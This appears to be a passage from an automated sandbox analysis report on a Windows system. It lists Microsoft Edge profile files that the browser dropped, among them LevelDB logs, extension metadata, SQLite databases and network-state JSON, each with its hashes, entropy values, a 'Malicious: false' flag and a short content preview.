Preview:	2024/11/29-06:27:51.047 7b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/29-06:27:51.047 7b8 Recovering log #3.2024/11/29-06:27:51.048 7b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.277358565583419
Encrypted:	false
SSDEEP:	6:HMbL7rN+q2PCHhJ23oH+Tcwt865IFUt8YMbLZ5Zmw+YMbLZtVkwOCHhJ23oH+Tc4:svAvBYeb/WFUt83vZ5/+3vZT56Yeb/+e
MD5:	903CC683530D4B629050C2FA717F02D4
SHA1:	7881B6D519A1317F725C7DFF2C94DFC829C5473E
SHA-256:	C4771F2018055FB37F79E33DE6507CDA47D9BF95A7529A4DEC0103231990EDFD
SHA-512:	2A2361E74A7843A448D684EEB006D335E72C8D12287ADCA109E6BAEDC78F558C2A906C6553BBAC81040EB7C1153207E84AFF7016D5218BFF36B86F39D40D13DC
Malicious:	false
Preview:	2024/11/29-06:27:51.049 7b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/29-06:27:51.050 7b8 Recovering log #3.2024/11/29-06:27:51.050 7b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.277358565583419
Encrypted:	false
SSDEEP:	6:HMbL7rN+q2PCHhJ23oH+Tcwt865IFUt8YMbLZ5Zmw+YMbLZtVkwOCHhJ23oH+Tc4:svAvBYeb/WFUt83vZ5/+3vZT56Yeb/+e
MD5:	903CC683530D4B629050C2FA717F02D4
SHA1:	7881B6D519A1317F725C7DFF2C94DFC829C5473E
SHA-256:	C4771F2018055FB37F79E33DE6507CDA47D9BF95A7529A4DEC0103231990EDFD
SHA-512:	2A2361E74A7843A448D684EEB006D335E72C8D12287ADCA109E6BAEDC78F558C2A906C6553BBAC81040EB7C1153207E84AFF7016D5218BFF36B86F39D40D13DC
Malicious:	false
Preview:	2024/11/29-06:27:51.049 7b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/29-06:27:51.050 7b8 Recovering log #3.2024/11/29-06:27:51.050 7b8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.265064036749924
Encrypted:	false
SSDEEP:	6:HMWq2PCHhJ23oH+Tcwt8NIFUt8YMyZmw+YMRFkwOCHhJ23oH+Tcwt8+eLJ:sWvBYebpFUt83y/+3P56YebqJ
MD5:	094A2B304CB01B78F3D196A9CFC98440
SHA1:	DA1D4ACDCBB6AC41049E8F13EE28D9B855912BA7
SHA-256:	615E90708E16A27ADD2BDDC0D1C5479D51C0CE740F2C4D2AC014C51705E65B7E
SHA-512:	13570D4D3D172C5C3AAC4563FA8EC2467FB3496AAAA5F6EDA5876F11930CFB47A18AC669322C3B7D7EEEDAA2107A176FC0129EF01C3D4BA0DDD6472B7B36AD60
Malicious:	false
Preview:	2024/11/29-06:27:52.316 5f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/29-06:27:52.317 5f4 Recovering log #3.2024/11/29-06:27:52.318 5f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.265064036749924
Encrypted:	false
SSDEEP:	6:HMWq2PCHhJ23oH+Tcwt8NIFUt8YMyZmw+YMRFkwOCHhJ23oH+Tcwt8+eLJ:sWvBYebpFUt83y/+3P56YebqJ
MD5:	094A2B304CB01B78F3D196A9CFC98440
SHA1:	DA1D4ACDCBB6AC41049E8F13EE28D9B855912BA7
SHA-256:	615E90708E16A27ADD2BDDC0D1C5479D51C0CE740F2C4D2AC014C51705E65B7E
SHA-512:	13570D4D3D172C5C3AAC4563FA8EC2467FB3496AAAA5F6EDA5876F11930CFB47A18AC669322C3B7D7EEEDAA2107A176FC0129EF01C3D4BA0DDD6472B7B36AD60
Malicious:	false
Preview:	2024/11/29-06:27:52.316 5f4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/29-06:27:52.317 5f4 Recovering log #3.2024/11/29-06:27:52.318 5f4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.2191763562065486
Encrypted:	false
SSDEEP:	3:ocpZtFlljq7A/mhWJFuQ3yy7IOWUYBdweytllrE9SFcTp4AGbNCV9RUIM:oYC75fO6Bd0Xi99pEYK
MD5:	46B9C1539F540D8E947651B55B5CBCB8
SHA1:	EDEE8CF59E2132A3BB40FDFD12839BBC5C03B8A2
SHA-256:	D5310B11A97B38C376B46B740C5A2566F6A4ABF95D113C2E11981251623FF81D
SHA-512:	05FE46F00693680F6BD5B010AE47C4DB184D400FF3A870D87617C82193CC0A3970B1501F70324DCABF057E5569D99A3B975BFE74F79DAB9476CE560D684C88AA
Malicious:	false
Preview:	..............y....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6476715435276956
Encrypted:	false
SSDEEP:	384:aj9P0lgam6Ihjlt773pLpP/KbtyQkQerLhlcERKToaAu:adrplt77P/ve2LAERKcC
MD5:	3956506DB3C63CF9D68633DF97E77AE0
SHA1:	BC6E87C78F697E531E1DDFE8A33B82B9DB2A5485
SHA-256:	0C3D56E7BBA204F284B08742E86A05A447B1ABE1D2672355F1DB1112D420ABE8
SHA-512:	325CDDA0A3462201D7C31CFFA8102835127FA796C83F2BDE46AAB7635B9228226A954F66A3A877B0B8B8D9B4EC616D7546457DD3B6519320A57CCC98124D5147
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	5.336733245128786
Encrypted:	false
SSDEEP:	12:sj8+vBYeb8rcHEZrELFUt83jt/+3jxV56Yeb8rcHEZrEZSJ:sjtBYeb8nZrExg83j2jx6Yeb8nZrEZe
MD5:	3829285EB2A9E919541F9316A5F4D4BD
SHA1:	BFD5F4F05423F2BFD2BB76A83DB3ACEA4769F2E1
SHA-256:	C77F7E8B0E6ACEB93A1A965035D211651BA884A05FF81B5D3C955EF96E70E899
SHA-512:	C55CC394597E9A4BC8A8F2587E23F1B6FABC5F27C8B9F12F04C7335AE8861C1204388585BFB3EFD667480E0E901FFCA5056B777CB0D6BE0133B8CC1C018AA357
Malicious:	false
Preview:	2024/11/29-06:27:55.864 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/29-06:27:55.865 d0c Recovering log #3.2024/11/29-06:27:55.865 d0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	5.336733245128786
Encrypted:	false
SSDEEP:	12:sj8+vBYeb8rcHEZrELFUt83jt/+3jxV56Yeb8rcHEZrEZSJ:sjtBYeb8nZrExg83j2jx6Yeb8nZrEZe
MD5:	3829285EB2A9E919541F9316A5F4D4BD
SHA1:	BFD5F4F05423F2BFD2BB76A83DB3ACEA4769F2E1
SHA-256:	C77F7E8B0E6ACEB93A1A965035D211651BA884A05FF81B5D3C955EF96E70E899
SHA-512:	C55CC394597E9A4BC8A8F2587E23F1B6FABC5F27C8B9F12F04C7335AE8861C1204388585BFB3EFD667480E0E901FFCA5056B777CB0D6BE0133B8CC1C018AA357
Malicious:	false
Preview:	2024/11/29-06:27:55.864 d0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/29-06:27:55.865 d0c Recovering log #3.2024/11/29-06:27:55.865 d0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1471
Entropy (8bit):	5.692555348602014
Encrypted:	false
SSDEEP:	24:Td2ZWAUl5XvXcvqIRXZZBlW2sFV03y1x4glMyspWVYUlHWNcgFHHmb2cytXo1:gZ65XvHIRXZM2iV03Sx4lyaSYjRHHS2s
MD5:	2F5EB527414E425615C3BB1369A885F5
SHA1:	E1EC92C866A149D5BA4907AC8C839B18F68528E2
SHA-256:	4AB3BDDA949721A3982505133EF27667199E7508CF9EF3CC4E8C5B79694FAF77
SHA-512:	177D844E00F756C83E811DFF36A4B33B48E7B89976833C6E850054789B2054FB5CF1033EB65198CD1E846AAFD61DF26502E135312C88425E2A6A5BD2E21C4B84
Malicious:	false
Preview:	L....................VERSION.1..META:https://ntp.msn.com..............!_https://ntp.msn.com..LastKnownPV..1732879686667.-_https://ntp.msn.com..LastVisuallyReadyMarker..1732879687758.._https://ntp.msn.com..MUID!.0D52E8701DB86AF23F08FD361CDF6BCA.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1732879686740,"schedule":[-1,22,-1,16,-1,-1,32],"scheduleFixed":[-1,22,-1,16,-1,-1,32],"simpleSchedule":[19,38,10,11,44,36,33]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1732879686622.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241122.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Fri Nov 29 2024 06:28:06 GMT-0500 (Eastern Standa

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.220373780970922
Encrypted:	false
SSDEEP:	6:HMbLrq2PCHhJ23oH+Tcwt8a2jMGIFUt8YMbLyFwZmw+YMbL2VFkwOCHhJ23oH+Tg:svrvBYeb8EFUt83vWw/+3v2VF56Yeb8N
MD5:	828E083F1A707CAAA70A554D0EAAEC3D
SHA1:	821267CAE0E47D0D8A4278523DC589F0E46BD9F0
SHA-256:	FC3C7B73F2AE5481C888BA774130D18917A7D69E4892F089BE7EFF088AFFEC3A
SHA-512:	5BEBA36208A36D49F78E465A2D40828ADBD487F62DDA7408A5DA3302215455D0379D105D4286A2020F7BC075D458F9885515838462AA4F181B6B43C56777D720
Malicious:	false
Preview:	2024/11/29-06:27:51.392 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/29-06:27:51.393 1fb0 Recovering log #3.2024/11/29-06:27:51.396 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.220373780970922
Encrypted:	false
SSDEEP:	6:HMbLrq2PCHhJ23oH+Tcwt8a2jMGIFUt8YMbLyFwZmw+YMbL2VFkwOCHhJ23oH+Tg:svrvBYeb8EFUt83vWw/+3v2VF56Yeb8N
MD5:	828E083F1A707CAAA70A554D0EAAEC3D
SHA1:	821267CAE0E47D0D8A4278523DC589F0E46BD9F0
SHA-256:	FC3C7B73F2AE5481C888BA774130D18917A7D69E4892F089BE7EFF088AFFEC3A
SHA-512:	5BEBA36208A36D49F78E465A2D40828ADBD487F62DDA7408A5DA3302215455D0379D105D4286A2020F7BC075D458F9885515838462AA4F181B6B43C56777D720
Malicious:	false
Preview:	2024/11/29-06:27:51.392 1fb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/29-06:27:51.393 1fb0 Recovering log #3.2024/11/29-06:27:51.396 1fb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1926aa11-c77c-465f-b97d-a31092fa34d6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1747
Entropy (8bit):	5.305044740996526
Encrypted:	false
SSDEEP:	48:YcCpfgCzsetsgfc7RsFGfleeIkEsFjCgH/wYhbt:F2fBT22GfkeIkxjT/Rhx
MD5:	F02009A91CAB63E71DCDAF4F953A9273
SHA1:	F917438E6F23DAEA1C81DF03621D7FFDB31D1C4B
SHA-256:	E923A44C41B4473D2BFD1A84D5E4854EDC74F8EA7CF94E696B066D12D4CFF827
SHA-512:	94F7F683EB3A0C5DC2924997B51D480136EBC5CB1C293EE77120750A6EA85F09EE92275619A53D3347AFC8BC7BDEB1CF166D5AEB101D986252407D3FBDC9F4B7
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379945275395891","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379945278512727","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_a

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\673b55ea-e08c-4eb1-9d03-9e0785bfac5d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\998c1fc3-f728-482f-925d-d66e23f7d6db.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9ea354d8-f679-4223-9152-2c06c953d48a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7762729476673766
Encrypted:	false
SSDEEP:	192:tTmbxi3EWDr6GHC92zU9dBYguXcf0L/ZJVb:VmliEWDuGHC92MBPuXI0LhJVb
MD5:	7A07FA3483CA56EC7E32CA592B14E9A7
SHA1:	0649129AF03AFA61CC65CC0F39A74F55F11F42BB
SHA-256:	71DAA1C4FD99F68A0D8B41BB425B0F809E150D75E000A0075091D6A7FA1907DF
SHA-512:	AF770A9A9ED7BF5371EACA4AC7D41201C32D6B6C1D6F650E4BBCFFB9397279FA2B6F542965E7AF77459C339D933E4683B13047E61AF70CD1909F86904A7CC4E5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1747
Entropy (8bit):	5.305044740996526
Encrypted:	false
SSDEEP:	48:YcCpfgCzsetsgfc7RsFGfleeIkEsFjCgH/wYhbt:F2fBT22GfkeIkxjT/Rhx
MD5:	F02009A91CAB63E71DCDAF4F953A9273
SHA1:	F917438E6F23DAEA1C81DF03621D7FFDB31D1C4B
SHA-256:	E923A44C41B4473D2BFD1A84D5E4854EDC74F8EA7CF94E696B066D12D4CFF827
SHA-512:	94F7F683EB3A0C5DC2924997B51D480136EBC5CB1C293EE77120750A6EA85F09EE92275619A53D3347AFC8BC7BDEB1CF166D5AEB101D986252407D3FBDC9F4B7
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379945275395891","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379945278512727","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_a

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.2793060900174957
Encrypted:	false
SSDEEP:	48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBok:JkIEumQv8m1ccnvS61DmdKiivGz1a
MD5:	9FF5E935112E50E00E121017CF4CEE2F
SHA1:	9E27E5674BF074BC2B3B41C2BE3057151FFFD3B8
SHA-256:	D6270B592FB402E7623DFF9ED19BC65F138BBD2F95E8CDED29C0A4CCDD48874D
SHA-512:	7B1400D6030BE4672928682B3FE8B4D5316AE00BCA280A489FB9773336934E31782B1499697ECA43454D35FA508E802D8A261FC4F720B0DCB26B87B028F4BC23
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
